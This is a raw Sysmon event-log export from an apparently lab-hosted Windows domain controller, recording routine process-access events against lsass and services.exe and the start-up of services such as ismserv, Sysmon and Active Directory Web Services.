10:40:09.942{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-3200-000000007F01}3048C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001221Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.940{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001220Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.940{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001219Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.940{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001218Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.940{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001217Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.937{733EE690-3DF7-5F80-0A00-000000007F01}8521228C:\Windows\system32\services.exe{733EE690-3E09-5F80-3200-000000007F01}3048C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001216Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.932{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-3200-000000007F01}3048C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001215Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.932{733EE690-3DF7-5F80-0A00-000000007F01}8521224C:\Windows\system32\services.exe{733EE690-3E09-5F80-3200-000000007F01}3048C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001214Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.930{733EE690-3E09-5F80-3200-000000007F01}3048C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001213Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.931{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001212Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.931{733EE690-3DF7-5F80-0A00-000000007F01}8522576C:\Windows\system32\services.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001211Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.898{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe12.0System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=0475D48604B7C8E7D9DD7605B6A5930F,SHA256=55BAD23D049A2FD801B8DECDC5D960D4E27D7F92541E8B37557B7495CA5561A2,IMPHASH=49AAA307415968B34D3FD1A72DEE6C71{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001210Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.930{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-2F00-000000007F01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001209Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.929{733EE690-3DF7-5F80-0A00-000000007F01}8521112C:\Windows\system32\services.exe{733EE690-3E09-5F80-2F00-000000007F01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001208Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.921{733EE690-3E09-5F80-2F00-000000007F01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.0Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F8D0C92070E59A059A889D5E269C0DA9,SHA256=D40478A82BB2993F39A3ED6066CD0599BE37FF9A0898636A680926FE145C64D6,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001207Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.927{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001206Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.927{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001205Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.927{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001204Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.926{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001203Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.926{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001202Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.926{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001201Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.926{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001200Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.926{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001199Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.926{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001198Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.926{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001197Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.926{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001196Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.924{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001195Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 